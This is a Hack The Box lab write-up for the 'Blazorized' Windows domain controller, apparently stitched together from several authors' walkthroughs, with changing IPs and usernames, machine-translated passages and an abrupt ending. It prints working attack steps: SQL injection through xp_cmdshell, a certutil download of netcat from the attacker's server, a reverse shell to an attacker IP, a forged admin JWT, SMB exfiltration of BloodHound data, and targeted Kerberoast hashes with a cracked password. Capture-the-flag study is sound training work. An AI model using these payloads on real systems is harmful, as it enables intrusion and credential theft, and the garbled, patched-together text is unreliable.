jaccostraathof

htb-blazorized

Blazorized

Blazorized in a Windows-focused box, starting with a website written using the Blazor .NET framework. I’ll reverse a DLL that comes from the server to the browser to find a JWT secret and use it to get access to the admin panel. There I’ll abuse SQL injection to get execution and a shell. To pivot to the next user, I’ll abuse the WriteSPN privilege to perform a targeted Kerberoast attack. Then I’ll abuse permissions to write another user’s login script. Finally, I’ll abuse the GetChangesAll permission with Mimikatz to dump the hashes for the domain and get a shell as administrator.

Recon

nmap

nmap finds many open TCP ports indicative of a Windows active directory domain controller:

└─$ nmap -sC -sV 10.10.11.22 -oN blazorized.nmap
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-24 13:09 CEST
Nmap scan report for blazorized.htb (10.10.11.22)
Host is up (0.010s latency).
Not shown: 986 closed tcp ports (reset)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Mozhar's Digital Garden
|_http-server-header: Microsoft-IIS/10.0
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-04-24 11:09:07Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: blazorized.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
1433/tcp open  ms-sql-s      Microsoft SQL Server 2022 16.00.1115.00; RTM+
| ms-sql-ntlm-info: 
|   10.10.11.22\BLAZORIZED: 
|     Target_Name: BLAZORIZED
|     NetBIOS_Domain_Name: BLAZORIZED
|     NetBIOS_Computer_Name: DC1
|     DNS_Domain_Name: blazorized.htb
|     DNS_Computer_Name: DC1.blazorized.htb
|     DNS_Tree_Name: blazorized.htb
|_    Product_Version: 10.0.17763
|_ssl-date: 2025-04-24T11:09:16+00:00; 0s from scanner time.
| ms-sql-info: 
|   10.10.11.22\BLAZORIZED: 
|     Instance name: BLAZORIZED
|     Version: 
|       name: Microsoft SQL Server 2022 RTM+
|       number: 16.00.1115.00
|       Product: Microsoft SQL Server 2022
|       Service pack level: RTM
|       Post-SP patches applied: true
|     TCP port: 1433
|_    Clustered: false
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-04-24T11:08:25
|_Not valid after:  2055-04-24T11:08:25
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: blazorized.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DC1; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-04-24T11:09:11
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.77 seconds

In addition to the typical DC ports (DNS on 53, Kerberos on 88, RPC on 135, netbios on 139, SMB on 445, LDAP on 389 and several others), there’s also a webserver on 80, MSSQL on 1433, and WinRM on 5985.

nmap also identifies a hostname, DC1.

The webserver is redirecting to blazorized.htb, indicating virtual host-based routing.

Subdomain Fuzz

Given the use of host-based routing, I’ll use ffuf to brute force any subdomains of blazorized.htb that respond differently:

puck@kali$ ffuf -u http://10.10.11.22 -H "Host: FUZZ.blazorized.htb" -w /opt/SecLists/Discovery/DNS/subdomains-top1million-20000.txt -ac


admin                   [Status: 200, Size: 2077, Words: 149, Lines: 28, Duration: 107ms]
:: Progress: [19966/19966] :: Job [1/1] :: 466 req/sec :: Duration: [0:00:43] :: Errors: 0 ::

It finds admin.blazorized.htb. I’ll add these to my /etc/hosts file, along with the hostname:

10.10.11.22 blazorized.htb admin.blazorized.htb dc1.blazorized.htb

SMB – TCP 445

netexec confirms the domain and hostname:

puck@kali$ netexec smb blazorized.htb
SMB         10.10.11.22     445    DC1              [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC1) (domain:blazorized.htb) (signing:True) (SMBv1:False)

I’m not able to access any share information anonymously:

puck@kali$ netexec smb blazorized.htb --shares
SMB         10.10.11.22     445    DC1              [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC1) (domain:blazorized.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.22     445    DC1              [-] IndexError: list index out of range
SMB         10.10.11.22     445    DC1              [-] Error enumerating shares: STATUS_USER_SESSION_DELETED
puck@kali$ netexec smb blazorized.htb -u guest -p '' --shares
SMB         10.10.11.22     445    DC1              [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC1) (domain:blazorized.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.22     445    DC1              [-] blazorized.htb\guest: STATUS_ACCOUNT_DISABLED 
puck@kali$ netexec smb blazorized.htb -u puck -p '' --shares
SMB         10.10.11.22     445    DC1              [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC1) (domain:blazorized.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.22     445    DC1              [-] blazorized.htb\puck: STATUS_LOGON_FAILURE

blazorized.htb – TCP 80

Site

The site is a personal “digital garden

Check for Updates” has an interesting button describing the API:

Clicking it doesn’t do anything, but in the background I can see requests for api.blazorized.htb:

On adding that to my hosts file, it runs and three new items are added to the menu:

These have short blog posts about programming and technical fields:

See other writeups .. for more

If we run it, the script generates a token:

❯ python3 generate_JWT_token.py

eyJhbGciOiJIUzUxMiIsInR5cCI6IkpXVCJ9.eyJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy93cy8yMDA1LzA1L2lkZW50aXR5L2NsYWltcy9lbWFpbGFkZHJlc3MiOiJzdXBlcmFkbWluQGJsYXpvcml6ZWQuaHRiIiwiaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93cy8yMDA4LzA2L2lkZW50aXR5L2NsYWltcy9yb2xlIjoiU3VwZXJfQWRtaW4iLCJpc3MiOiJodHRwOi8vYXBpLmJsYXpvcml6ZWQuaHRiIiwiYXVkIjoiaHR0cDovL2FkbWluLmJsYXpvcml6ZWQuaHRiIiwiZXhwIjoxNzIxNjIyMTkyfQ.odLhTL_xCynUd24s78wRnyg18N1D9wF2F5jmyCBqgs8WJ3-BfhfHPrqO4h2OqFyjlFBjDy0xUX37y0dLELdefA

Just to review if this has worked, we can check the JWTposted at https://jwt.io/ .

Blazorized 8

Let’s go on. The part “audience” in a JWTshows the pages for which the JWTis intended for use. It is used to make sure that the token is only accepted by the “audience” (audience); that in this specific case it is http://admin.blazorized.htb. From maner that, based on it, we assume that the token generated is useful for the website http://admin.blazorized.htbPreviously found. Let’s also note that the duration of the token is only 60 seconds, so when generating the token we will have only 1 minute to use it (based on the variable expiration_duration_in_secondsin the script). If this doesn’t work, we must re-generate a new token.

(Another way would increase the expiration time of the token of 60a much higher value in the script, but that honestly didn’t taste it. I leave it as a task for the reader)

After generating the token, in an internet browser like FirefoxLet’s go to http://admin.blarozized.htbThen let’s go to the Storage(Ctrl + Shift + I), then Local Storageand add (clicking on the symbol +) new data to be stored. As a name (key) I put jwt, and as value (value) I put the JWTby our script of Python:

Blazorized 9

We reload the page and we’re inside:

On the left side of the page there is a search tool in Check Duplicate Post Titles. Clicking on this sample:

Blazorized 11

Let’s remember that this machine was running a service. Microsoft SQL Server(MSSQL). So this search engine may be using that service.

After trying a lot of things, and since you’re using a database. SQLWe tried some. SQL Injections. For this we started a listener by traces ICMPin our attacker machine using tcpdump:

❯ sudo tcpdump -ni tun0 icmp

Finally, one of the injections works (based on Payload AllTheThings payloads):

';exec master..xp_cmdshell "ping -n 1 10.10.14.5" --+

Blazorized 12

And we get something in our listener:

❯ sudo tcpdump -ni tun0 icmp

tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
00:52:11.744937 IP 10.10.11.22 > 10.10.16.3: ICMP echo request, id 1, seq 415, length 40
00:52:11.744948 IP 10.10.16.3 > 10.10.11.22: ICMP echo reply, id 1, seq 415, length 40

We have remote command execution.

Therefore, to send us a reverse shell, we will pass a binary of netcatfor Windowsto the victim machine. First, we started a temporary server. PythonHTTPin the port 8000in our attacker machine running:

❯ ls && python3 -m http.server 8000

generate_JWT_token.py  nc64.exe
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

We use the tool certutilon the victim machine running at the search terminal the injection:

';exec master..xp_cmdshell "C:\Windows\System32\cmd.exe /c certutil.exe -urlcache -split -f http://10.10.14.5:8000/nc64.exe C:\Users\Public\Downloads\nc.exe" --+

where 10.10.14.5It’s our attacker’s IP.

Then, on our attacker machine, we started a listener with netcatin the port 443along with rlwrap:

❯ rlwrap -cAr nc -lvnp 443

listening on [any] 443 ...

Finally, we run the binary of netcattransferred to send us a reverse shell injecting the command:

';exec master..xp_cmdshell "C:\Users\Public\Downloads\nc.exe 10.10.14.5 443 -e C:\Windows\System32\cmd.exe" --+

and we get a shell like the user nu_1055:

❯ rlwrap -cAr nc -lvnp 443

listening on [any] 443 ...
connect to [10.10.16.3] from (UNKNOWN) [10.10.11.22] 60850
Microsoft Windows [Version 10.0.17763.5936]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami

whoami
blazorized\nu_1055

We can read the user flag in this user’s Desktop directory.

 

Shell

To get a shell, I’ll grab the PowerShell #3 (Base64) payload from revshells.com and replace ping 10.10.14.6 with that in the form:

 On sending, I get a shell as nu_1055 at nc:

puck@kali$ rlwrap -cAr nc -lnvp 443
Listening on 0.0.0.0 443
Connection received on 10.10.11.22 49828

PS C:\Windows\system32> whoami
blazorized\nu_1055

I’ll find user.txt on the desktop:

PS C:\users\nu_1055\desktop> type user.txt
6c6560db************************

Shell as rsa_4810

Enumeration

Home Directories

There are three non-admin users with home directories on Blazorized:

PS C:\users> ls

    Directory: C:\users

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         2/2/2024   4:13 PM                Administrator
d-----        2/25/2024   2:41 PM                NU_1055
d-r---        10/6/2021   3:46 PM                Public
d-----         2/1/2024   8:36 AM                RSA_4810
d-----        6/19/2024   8:39 AM                SSA_6010

nu_1055 can’t access anyone else’s, and there’s nothing interesting in their home directory.

Web Data

The IIS web directories are in \inetpub:

PS C:\inetpub> ls

    Directory: C:\inetpub

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         1/9/2024   5:17 AM                custerr
d-----        6/27/2024   8:05 AM                history
d-----         1/9/2024   5:17 AM                logs
d-----         1/9/2024   5:18 AM                temp
d-----        1/18/2024   2:00 PM                wwwroot

In wwwroot there’s a folder for each domain, as well as the web.config file that handles the virtual host-based routing:

PS C:\inetpub\wwwroot> ls

    Directory: C:\inetpub\wwwroot

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        1/21/2024   4:44 PM                Blazorized.API
d-----        2/25/2024   7:26 AM                Blazorized.DigitalGarden
d-----        2/25/2024   7:38 AM                Blazorized.DigitalGardenAdmin
-a----         1/9/2024   5:17 AM            703 iisstart.htm
-a----         1/9/2024   5:17 AM          99710 iisstart.png
-a----        1/18/2024   2:13 PM            583 web.config

The web applications are a series of compiled executables (.dll). I can come look at them if I need to, but I won’t need to in this case.

Other File System

The root of the C:\ drive has a couple interesting directories:

PS C:\> ls

    Directory: C:\

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         1/9/2024   5:17 AM                inetpub
d-----         2/1/2024   6:24 AM                Microsoft
d-----        2/25/2022  10:20 AM                PerfLogs
d-r---        6/21/2024   9:02 AM                Program Files
d-----         2/1/2024   4:34 AM                Program Files (x86)
d-----        1/16/2024   7:23 PM                SQL2022
d-----        6/19/2024  11:45 AM                Temp
d-r---        6/20/2024   7:28 AM                Users
d-----        6/21/2024   9:40 AM                Windows

Microsoft has a file at C:\Microsoft\Windows\PowerShell\StartupProfileData-Interactive. This file shows up when PowerShell is run in an odd way, but isn’t interesting as far as exploiting the box.

SQL2022 is empty.

Bloodhound

Setup

I’m using the newer Bloodhound-CE, which runs really nicely as a Docker container. I’ll set it up with a curl command into docker compose:

puck@hkali$ curl -L https://ghst.ly/getbhce | BLOODHOUND_PORT=8888 docker compose -f - up
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   156  100   156    0     0    335      0 --:--:-- --:--:-- --:--:--   335
100  3784  100  3784    0     0   4615      0 --:--:-- --:--:-- --:--:--  4615
[+] Running 1/0
 ✔ Container blazorized-10101122-app-db-1  Running                                                                                                                                                                                       0.0s
Attaching to app-db-1, bloodhound-1, graph-db-1
graph-db-1    | Changed password for user 'neo4j'. IMPORTANT: this change will only take effect if performed before the database is started for the first time.
graph-db-1    | 2024-11-01 11:00:44.324+0000 INFO  Starting...
graph-db-1    | 2024-11-01 11:00:44.616+0000 INFO  This instance is ServerId{e9b76907} (e9b76907-bc64-4830-b858-eeb2203107ce)
graph-db-1    | 2024-11-01 11:00:45.407+0000 INFO  ======== Neo4j 4.4.38 ========
graph-db-1    | 2024-11-01 11:00:47.121+0000 INFO  Initializing system graph model for component 'security-users' with version -1 and status UNINITIALIZED
graph-db-1    | 2024-11-01 11:00:47.129+0000 INFO  Setting up initial user from `auth.ini` file: neo4j
graph-db-1    | 2024-11-01 11:00:47.129+0000 INFO  Creating new user 'neo4j' (passwordChangeRequired=false, suspended=false)
graph-db-1    | 2024-11-01 11:00:47.147+0000 INFO  Setting version for 'security-users' to 3
...[snip]...

This is the same command in the documentation except I added BLOODHOUND_PORT=8888 as by default it wants to run the webserver on 8080 where I have Burp already listening.

With only a shell and no creds for the box, I’ll need to collect Bloodhound data using something running on Blazorized. I’ve got SharpHound.exe from the above, which I’ll upload to Blazorized and run:

PS C:\programdata> wget http://10.10.14.6/SharpHound.exe -outfile SharpHound.exe
PS C:\programdata> .\SharpHound.exe -c all
2024-11-01T06:09:19.7721017-05:00|INFORMATION|This version of SharpHound is compatible with the 5.0.0 Release of BloodHound
2024-11-01T06:09:20.0220952-05:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, UserRights, CARegistry, DCRegistry, CertServices
2024-11-01T06:09:20.0689718-05:00|INFORMATION|Initializing SharpHound at 6:09 AM on 11/1/2024
2024-11-01T06:09:20.1158490-05:00|INFORMATION|Resolved current domain to blazorized.htb
2024-11-01T06:09:20.2564704-05:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, UserRights, CARegistry, DCRegistry, CertServices
2024-11-01T06:09:20.3970940-05:00|INFORMATION|Beginning LDAP search for blazorized.htb
2024-11-01T06:09:20.5064724-05:00|INFORMATION|Beginning LDAP search for blazorized.htb Configuration NC
2024-11-01T06:09:20.5377221-05:00|INFORMATION|Producer has finished, closing LDAP channel
2024-11-01T06:09:20.5377221-05:00|INFORMATION|LDAP channel closed, waiting for consumers
2024-11-01T06:09:20.5845970-05:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for BLAZORIZED.HTB
2024-11-01T06:09:20.5845970-05:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for BLAZORIZED.HTB
2024-11-01T06:09:20.9283450-05:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for BLAZORIZED.HTB
2024-11-01T06:09:21.4908447-05:00|INFORMATION|Consumers finished, closing output channel
Closing writers
2024-11-01T06:09:21.5220984-05:00|INFORMATION|Output channel closed, waiting for output task to complete
2024-11-01T06:09:21.6627215-05:00|INFORMATION|Status: 313 objects finished (+313 313)/s -- Using 37 MB RAM
2024-11-01T06:09:21.6627215-05:00|INFORMATION|Enumeration finished in 00:00:01.2861155
2024-11-01T06:09:21.7877405-05:00|INFORMATION|Saving cache with stats: 20 ID to type mappings.
 2 name to SID mappings.
 1 machine sid mappings.
 4 sid to domain mappings.
 0 global catalog mappings.
2024-11-01T06:09:21.8346081-05:00|INFORMATION|SharpHound Enumeration Completed at 6:09 AM on 11/1/2024! Happy Graphing!

The output is a zip archive:

PS C:\programdata> ls *.zip

    Directory: C:\programdata

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        11/1/2024   6:09 AM          26090 20241101060921_BloodHound.zip

I’ll start smbserver.py on my host creating a share named share:

oxdf@hacky$ smbserver.py share . -smb2support -username oxdf -password oxdf
Impacket v0.13.0.dev0+20241024.90011.835e1755 - Copyright Fortra, LLC and its affiliated companies 

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed

I’ll connect to the share from Blazorized and exfil the collection:

PS C:\programdata> net use \\10.10.14.6 /u:oxdf oxdf
The command completed successfully.
PS C:\programdata> copy *.zip \\10.10.14.6\share\

Bloodhound Targeted Kerberoast

 

Analysis

I’ll click “Explore” and get to the Bloodhound window. I’ll start by finding the user I own, nu_1055, and marking them as owned. The first thing I always look at is “Outbound Object Control”:

 

Targeted Kerberoast Background

A Service Principal Name (SPN) is a unique identifier that associates a service instance with a service account in Kerberos.

Kerberoasting is an attack where an authenticated user requests a ticket for a service by it’s SPN, and the ticket that comes back is encrypted with the password of the user associated with that service. If that password is weak, it can be broken in offline brute force.

To perform a targeted kerberoast, I’ll assign an SPN to the RSA_4810 account. Then I can request a ticket as that fake service, and get a ticket encrypted with RSA_4810’s password to crack.

The full process for performing this attack from Windows is given in the “Windows Abuse” section of the right hand panel in Bloodhound when I click on WriteSPN:

 

 

Exploit

I’ll need PowerView to run the commands above. I’ll download it to my host, server it with Python, and upload it to Blazorized. Next I’ll import it:

PS C:\programdata> . .\PowerView.ps1

Now I’ll set the SPN on the user:

PS C:\programdata> Set-DomainObject -Identity RSA_4810 -Set @{serviceprincipalname='nonexistent/BLAHBLAH'}
or PS C:\programdata> Set-ADUser -Identity RSA_4810 -Add @{ServicePrincipalName='nonexistent/BLAHBLAH'}

And get a ticket, outputting the hash:

PS C:\programdata> Get-DomainUSer RSA_4810 | Get-DomainSPNTicket | Select-Object -ExpandProperty Hash
$krb5tgs$23$*RSA_4810$blazorized.htb$nonexistent/BLAHBLAH*$5AB431F9A16255580AC64A945C3EE2EF$AE1E3FA9D3DD4523FC011F824BEAF1ADD4B48765084C51B09AE51B988B33ADE938DCCA763FD88D3DA29D0666A0198A105921ED200782D01241117A7222C98C9717FBAEADB79DF75811F45F769CDB1F80E8A2EA73999CB894BB7CC833F7DFE752A9F61684FB39AB3E9ADA2609EB336635D7050C9A68881A8018FF5941CCFA7FE381C272CFAD3901588AA892490D2A59E3E4C4056E811AAA2E8200C686156BB78202FAC986A8C9799FC7DA0E4AF126154234420697B65115DC3116DD3958A6AF6206D483A572CC368428F8B38FB00BA17BBAB46D3CE277DB8A14D51B3AE92F8D41632EC88139A13D6A2FBD08417BC74C21ADE120E7226620A2499E98EAAF308E5EAF3430E6D82713DF5754DEA62857885455DBD482A174406DBF03681EC41AB964F6E88F77139DD0DBDD132F5F785C9BD3FD6A14D441F25380643D0B14EF8052CB89EC19244530868D3EFF7549B190319020066C31E39BE34D6481E4B4949AE8F4441AC55A0F0E35454CD82ACE715D40AA632B19B24E308571CE6AF5AB3F22CFF75792F22B07F13D6A5B65318A2C6C0FF05D193A5BB51ADF3D7568BF544960A476A62E25CBE1E88B5218479A41CB7860AE2DA50D5094F706A702C85A9290C06C7EF2E7CBC2EE40600516A5BD3933613D5154A810D47799E5BD9B3AC80DC5F3CC69128580E7F74563817AF617344533E241F310E0D42F7D057535D40481A620EE28E7E0425B860925A1C69C16B533C4D7512D2B028B5EC9A04157E3852EE934D3CFA9B88F8C4EEAF31B42350E51F10F745E9CC1AFBB1FA2D91BFAF6FB149E93BAF4E06CB9D942A3B78BD13FC2D7A5833D5B901DD197A017EB400F9434833BBA097C0D09F17B35EC84A685276C14CA6FBB5CF361B7810E1B8832FC1F2CBFF50A0E5396052957CE1D38D9C23D05733C1145A3FCFC83F077BF49BE812406246E09E23B0C85ED8C5AFD4137E9643B21F85DF26CBEE0073DD9DDA3D17178654BC8DFFEE39F1F70B48FDA4029A67B6A96AD95E6ABEDB107ED255AC8B4DB45B19296B5905FF3126C50567BDEB6825AE6CD56D9F65133EF8BB0A8C0130878E4F9EB78401D33E9462F9370AB2D3486721A0C3FB38963E166C37F69992A96C6004CBD65D08ACF9B3225EED3A753A14DB6B7D3A7547E8075E56AD5D9CAC891F907F17D0B2E1B87225A5C56B72CC67E9A161A51B60F7DF2DE55CC70D5C7B940386BBD0BFA4079F1F81FEE7B90482B307F819506028910C511890D9897BCFE96BE0FB76DD45D125A773739CA0B6A0EE76945237D8B12ECA112D43F639D690113C6681033CC62A9BAE235A1865C18C170FB3F534EF44E4BD111EF651501AAA168DD58E2F109009A0A51BEF25F96747CF60C1B32696E1F885FF90504C05E24A93A2616DE3DDACE2D2DF46DEBF36DA4BE7F1A972AD48D71863BBB35A3793683380FB61DFF44F36846A2B3EC21635CFAF9D82B23D36EC546344652FFC875D8B2E1805BECCECE6839BAAD3A58D16617F4039108C21AC3622724DEF43B68776C33CC05B5082C807C14D2350FD3BEBD62C59F6C1510D95EE441D32749696195B71D8E34AE8C90D1C7BC1FD6B2D786A72E08858E20F98483C6ECB853B2D3F6782C4BB2DB433B43E623FCFCB8B0A8ABB2D2B929A3AA6EEE6E40C950D51E9F2E9C6C7DFDED56D24D68F67A3F21AC19DA0C9450F9EB53DE59B18A9981892AD2EC9CA38D825FC26F64A4B31A0D677D9509D3DFA3B33EE4106D7AD40E02C08C97513298C1298C1414EF6BF6198335C2709CD1C5BB597F

Crack Hash

I’ll save that hash to a file on my host and pass it to hashcat:

$ hashcat rsa_4810.hash /opt/SecLists/Passwords/Leaked-Databases/rockyou.txt 
hashcat (v6.2.6) starting in autodetect mode
...[snip]...
Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:

13100 | Kerberos 5, etype 23, TGS-REP | Network Protocol

NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!
Do NOT report auto-detect issues unless you are certain of the hash type.
...[snip]...
$krb5tgs$23$*RSA_4810$blazorized.htb$nonexistent/BLAHBLAH*$5ab431f9a16255580ac64a945c3ee2ef$ae1e3fa9d3dd4523fc011f824beaf1add4b48765084c51b09ae51b988b33ade938dcca763fd88d3da29d0666a0198a105921ed200782d01241117a7222c98c9717fbaeadb79df75811f45f769cdb1f80e8a2ea73999cb894bb7cc833f7dfe752a9f61684fb39ab3e9ada2609eb336635d7050c9a68881a8018ff5941ccfa7fe381c272cfad3901588aa892490d2a59e3e4c4056e811aaa2e8200c686156bb78202fac986a8c9799fc7da0e4af126154234420697b65115dc3116dd3958a6af6206d483a572cc368428f8b38fb00ba17bbab46d3ce277db8a14d51b3ae92f8d41632ec88139a13d6a2fbd08417bc74c21ade120e7226620a2499e98eaaf308e5eaf3430e6d82713df5754dea62857885455dbd482a174406dbf03681ec41ab964f6e88f77139dd0dbdd132f5f785c9bd3fd6a14d441f25380643d0b14ef8052cb89ec19244530868d3eff7549b190319020066c31e39be34d6481e4b4949ae8f4441ac55a0f0e35454cd82ace715d40aa632b19b24e308571ce6af5ab3f22cff75792f22b07f13d6a5b65318a2c6c0ff05d193a5bb51adf3d7568bf544960a476a62e25cbe1e88b5218479a41cb7860ae2da50d5094f706a702c85a9290c06c7ef2e7cbc2ee40600516a5bd3933613d5154a810d47799e5bd9b3ac80dc5f3cc69128580e7f74563817af617344533e241f310e0d42f7d057535d40481a620ee28e7e0425b860925a1c69c16b533c4d7512d2b028b5ec9a04157e3852ee934d3cfa9b88f8c4eeaf31b42350e51f10f745e9cc1afbb1fa2d91bfaf6fb149e93baf4e06cb9d942a3b78bd13fc2d7a5833d5b901dd197a017eb400f9434833bba097c0d09f17b35ec84a685276c14ca6fbb5cf361b7810e1b8832fc1f2cbff50a0e5396052957ce1d38d9c23d05733c1145a3fcfc83f077bf49be812406246e09e23b0c85ed8c5afd4137e9643b21f85df26cbee0073dd9dda3d17178654bc8dffee39f1f70b48fda4029a67b6a96ad95e6abedb107ed255ac8b4db45b19296b5905ff3126c50567bdeb6825ae6cd56d9f65133ef8bb0a8c0130878e4f9eb78401d33e9462f9370ab2d3486721a0c3fb38963e166c37f69992a96c6004cbd65d08acf9b3225eed3a753a14db6b7d3a7547e8075e56ad5d9cac891f907f17d0b2e1b87225a5c56b72cc67e9a161a51b60f7df2de55cc70d5c7b940386bbd0bfa4079f1f81fee7b90482b307f819506028910c511890d9897bcfe96be0fb76dd45d125a773739ca0b6a0ee76945237d8b12eca112d43f639d690113c6681033cc62a9bae235a1865c18c170fb3f534ef44e4bd111ef651501aaa168dd58e2f109009a0a51bef25f96747cf60c1b32696e1f885ff90504c05e24a93a2616de3ddace2d2df46debf36da4be7f1a972ad48d71863bbb35a3793683380fb61dff44f36846a2b3ec21635cfaf9d82b23d36ec546344652ffc875d8b2e1805beccece6839baad3a58d16617f4039108c21ac3622724def43b68776c33cc05b5082c807c14d2350fd3bebd62c59f6c1510d95ee441d32749696195b71d8e34ae8c90d1c7bc1fd6b2d786a72e08858e20f98483c6ecb853b2d3f6782c4bb2db433b43e623fcfcb8b0a8abb2d2b929a3aa6eee6e40c950d51e9f2e9c6c7dfded56d24d68f67a3f21ac19da0c9450f9eb53de59b18a9981892ad2ec9ca38d825fc26f64a4b31a0d677d9509d3dfa3b33ee4106d7ad40e02c08c97513298c1298c1414ef6bf6198335c2709cd1c5bb597f:(Ni7856Do9854Ki05Ng0005 #)
...[snip]...

It auto-detects the hash format, and in about 5 seconds finds the password “(Ni7856Do9854Ki05Ng0005 #)”.

Or we use targetedKerberoast.py -v -d 'blazorized.htb' -u 'NU_1055' -p 'Start123!'

┌──(bolke㉿bolke)-[~/targetedKerberoast]
└─$ targetedKerberoast.py -v -d 'blazorized.htb' -u 'NU_1055' -p 'Start123!' 
targetedKerberoast.py: command not found
                                                                                                                     
┌──(bolke㉿bolke)-[~/targetedKerberoast]
└─$ python3 targetedKerberoast.py -v -d 'blazorized.htb' -u 'NU_1055' -p 'Start123!'
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[+] Printing hash for (RSA_4810)
$krb5tgs$23$*RSA_4810$BLAZORIZED.HTB$blazorized.htb/RSA_4810*$f783f3e82de70ef51c9ef82fd8745e2a$1488e85d10505da9b267cd082317eb6fe2b28218477dc6d996914a868235e36957649f79f9639f011c31226fafcf19a0bdb923e2d3ba3b3feb82a8d0288c8f3e0866516ee00e8723496edde12cfc920a2d10ac65bf08181b713dd22126f7229cc79634a985270003353431141bfd7822d9f3a840d0b4b5be906fad1f75d61ea33557bbf326208cd0751d6e278b312bb2578d13891beb4d84315b8b07ee868bd028d310813062fb70ed95313f90393cb41d829e5e31aac727debed362fce2fdf044af44c5adf99c0fb960d232eee822645656bc64a739f3835780f3ecae3ac154f961c9b344854ce11e01e67b6f3cf6e47ec36fc7519f84aa998353fb338fbcf4ad0b74bba773e291477ac0ace03f00903da41c3cddf623e701d8747b67fd14a31984e72d87029963ff6c0b3b612c063ae65c5b907977feff6b7d574fe70292d2725052e905f96c0f250520080b5bcd2f933001ae34ac0e2dc858c09ff19fe5c620c8458d05abfaebc554a58d939ae29ecbf188c35d602467dd03656658b586dd4871b4c6f24f951bacce026b527207ccfd60afcfbcbcda700ef0c02325361ebc52d54d75a78fe9db67e73b6e19b652f498542a37fe2a6bf55cbe494e0e21c8c3631edbcf753f0c89947640f0fe5a3cf39077051e562bf76bee7ce646c5417804be7fdb8b45f281bf53f0652803366c5d3068b27c886113e1942d07c325b7e043c4c3632a66dd9b41527a8bae37a3831be8c99db2710450e66fe473b78c6a36c527e456f584d69ee0199ddbfbd70e1e9f2bff5af0dbe07f700e8ece4cbc59496a9022ecd9a87730c7b44cf0dfe2841be12ff96d032ffda6d4344c84441790f47ad9d16a85f336ed7ab27ffee7d8a51ca9afe4f4649e6d018c22baaec504800d14818b65f189b0af2e8121fceb940648ce38efada01c1d5b6f056ad3cfd38b3bb96bbc7ae1582bcb51303665f77e53a32dc331a7e1221507e5f1ddb4a405fa230004caad0e3ad87dbd36a0977c041400b510f4ee993c32bd214018a5f02daaf24732f796cd6199aa8d46fcb14ce7f67b3efa7326bcdd1dd0c6f864d774afde7270721b3f22458e0140b764dfae91d14a2330eff38a940ad7d09660aa88113a31c535753d78c0294e017a501aed616817427b919d3a52b20286b1872ab512d2a9d06e7f1a39269543ed18fc0915e8d16658bda01a23002c9a903b6a19f49da97384e430e338679fd09dc0a74ca01301c08a7898a6b67d8a0f1f5502173202d8984dffed2213ebd8ff42592cb432cefab7bd07326069287bf386f059d08fad68d3fb6c4c93c3363528f418101d4dc6f641176229f88c0032c3136fdffefc4727385eecf6d603461d4a2f09563840fbf43a50d15107f64495901f952c0255b8e7e5a9645869f32240859a0b923f09772ab68ff50686e4c056f038ab5ce3ffeeea4f4c7f7d0afeeeab53ddb87f0a222b900e29fdc1365135a027673acfd912578145013316f2d9ee8cfcb14c0b20a084f8a12930baf53438d00e0cfe9ddad0086890d8cd3311a6f0750b9dd1366d01a4693b29cb6eba343a4e665fd01ac564dda94ab22ef33fe3fb937b470276ab883c26
                                                                                                                     
┌──(bolke㉿bolke)-[~/targetedKerberoast]

